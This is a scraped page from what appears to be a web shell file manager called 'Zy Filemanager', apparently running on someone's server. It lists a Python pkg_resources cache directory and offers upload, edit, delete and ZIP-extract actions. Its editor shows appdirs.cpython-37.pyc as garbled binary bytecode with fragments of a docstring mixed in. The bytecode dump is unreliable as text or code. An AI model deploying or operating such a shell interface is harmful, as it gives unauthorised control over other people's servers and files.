⚠️ BACKUP DATA ANDA SECARA TERATUR! File manager ini untuk keperluan teknis.
Zy Filemanager
berang berang bawa gelek berangkat lek !!!
🌙 Dark Mode
🏠 Home Shell
🔄 Refresh
Current Path:
Home Shell
/
opt
/
alt
/
python37
/
lib
/
python3.7
/
site-packages
/
pkg_resources
/
_vendor
/
__pycache__
⬆️ Parent Directory
📁 File Browser
Name
Size
Permissions
Modified Date
Actions
📄
__init__.cpython-37.pyc
(235 bytes)
235 B
0644
📅
✏️
✍️
⬇️
🗑️
📄
appdirs.cpython-37.pyc
(20,723 bytes)
20.24 KB
0644
📅
✏️
✍️
⬇️
🗑️
📄
pyparsing.cpython-37.pyc
(203,079 bytes)
198.32 KB
0644
📅
✏️
✍️
⬇️
🗑️
📤 Upload Files
Single File
Multiple Files
ZIP Extract
ZIP file will be deleted after extraction
➕ Create New
New Folder
New File
✍️ Editing: appdirs.cpython-37.pyc
File: /opt/alt/python37/lib/python3.7/site-packages/pkg_resources/_vendor/__pycache__/appdirs.cpython-37.pyc
Size: 20.24 KB | Last Modified: 2023-11-14 04:35:13
💾 Backup File
🔢 Toggle Line Numbers
B ��Re}` � @ s� d Z dZd�eee��ZddlZddlZejd dkZ e r>eZ ej�d�r�ddlZe� � d d Ze�d�rrdZq�e�d �r�d Zq�dZnejZd4d d�Zd5dd�Zd6dd�Zd7dd�Zd8dd�Zd9dd�Zd:dd�ZG dd� de�Zdd� Zd d!� Zd"d#� Zd$d%� Zedk�r�yddlZeZW nn e k �r� ydd&l!m"Z" eZW nB e k �r� yddl#Z$eZW n e k �r� eZY nX Y nX Y nX e%d'k�r�d(Z&d)Z'd*Z(e)d+e � e)d,� ee&e'd-d.�Z*x$e(D ]Z+e)d/e+e,e*e+�f � �q�W e)d0� ee&e'�Z*x$e(D ]Z+e)d/e+e,e*e+�f � �qW e)d1� ee&�Z*x$e(D ]Z+e)d/e+e,e*e+�f � �q:W e)d2� ee&dd3�Z*x$e(D ]Z+e)d/e+e,e*e+�f � �qtW dS );zyUtilities for determining application-specific dirs. See <http://github.com/ActiveState/appdirs> for details and usage. )� � � �.� Nr �java�Windows�win32ZMac�darwinZlinux2Fc C s� t dkr^|dkr| }|rdpd}tj�t|��}| r�|dk rNtj�||| �}q�tj�|| �}nNt dkr�tj�d�}| r�tj�|| �}n&t�dtj�d ��}| r�tj�|| �}| r�|r�tj�||�}|S ) aJ Return full path to the user-specific data dir for this application. "appname" is the name of application. If None, just the system directory is returned. "appauthor" (only used on Windows) is the name of the appauthor or distributing body for this application. Typically it is the owning company name. This falls back to appname. You may pass False to disable it. "version" is an optional version path element to append to the path. You might want to use this if you want multiple versions of your app to be able to run independently. If used, this would typically be "<major>.<minor>". Only applied when appname is present. "roaming" (boolean, default False) can be set True to use the Windows roaming appdata directory. That means that for users on a Windows network setup for roaming profiles, this user data will be sync'd on login. See <http://technet.microsoft.com/en-us/library/cc766489(WS.10).aspx> for a discussion of issues. Typical user data directories are: Mac OS X: ~/Library/Application Support/<AppName> Unix: ~/.local/share/<AppName> # or in $XDG_DATA_HOME, if defined Win XP (not roaming): C:\Documents and Settings\<username>\Application Data\<AppAuthor>\<AppName> Win XP (roaming): C:\Documents and Settings\<username>\Local Settings\Application Data\<AppAuthor>\<AppName> Win 7 (not roaming): C:\Users\<username>\AppData\Local\<AppAuthor>\<AppName> Win 7 (roaming): C:\Users\<username>\AppData\Roaming\<AppAuthor>\<AppName> For Unix, we follow the XDG spec and support $XDG_DATA_HOME. That means, by default "~/.local/share/<AppName>". r N� CSIDL_APPDATA�CSIDL_LOCAL_APPDATAFr z~/Library/Application Support/� XDG_DATA_HOMEz~/.local/share)�system�os�path�normpath�_get_win_folder�join� expanduser�getenv)�appname� appauthor�version�roaming�constr � r ��/builddir/build/BUILDROOT/alt-python37-setuptools-58.3.0-4.el8.x86_64/opt/alt/python37/lib/python3.7/site-packages/pkg_resources/_vendor/appdirs.py� user_data_dir- s&